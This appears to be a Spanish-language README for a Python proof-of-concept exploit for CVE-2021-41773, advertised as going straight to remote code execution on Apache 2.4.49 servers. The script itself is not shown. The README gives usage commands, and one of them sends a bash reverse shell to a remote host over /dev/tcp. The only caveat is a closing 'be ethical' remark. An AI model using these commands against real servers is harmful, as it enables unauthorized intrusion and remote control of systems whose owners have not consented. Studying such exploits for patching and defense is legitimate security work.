
Exploit de prueba de concepto basado en Python para CVE-2021-41773, que permite la ejecución remota de código en servidores Apache 2.4.49 con opciones de comando y puerto personalizados.
PoC para CVE-2021-41773 ya que encontré exploits demasiado complicados y este va directo a la Ejecución Remota de Código.
Simplemente especifica la dirección IP que ejecuta el servidor vulnerable Apache 2.4.49 con -i y el comando de sistema deseado con -c. Si el servidor web no se ejecuta en el puerto 80 podemos especificarlo con -p y si el servidor web está usando HTTPs necesitas usar el flag --use-https.
$ python3 CVE-2021-41773.py -i 10.10.10.10 -c 'id'
$ python3 CVE-2021-41773.py -i example.com -p 8080 -c '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'
$ python3 CVE-2021-41773.py -i 20.20.20.20 -p 443 --use-https -c 'whoami'
Úsalo bajo tu propia responsabilidad (:
Sé ético.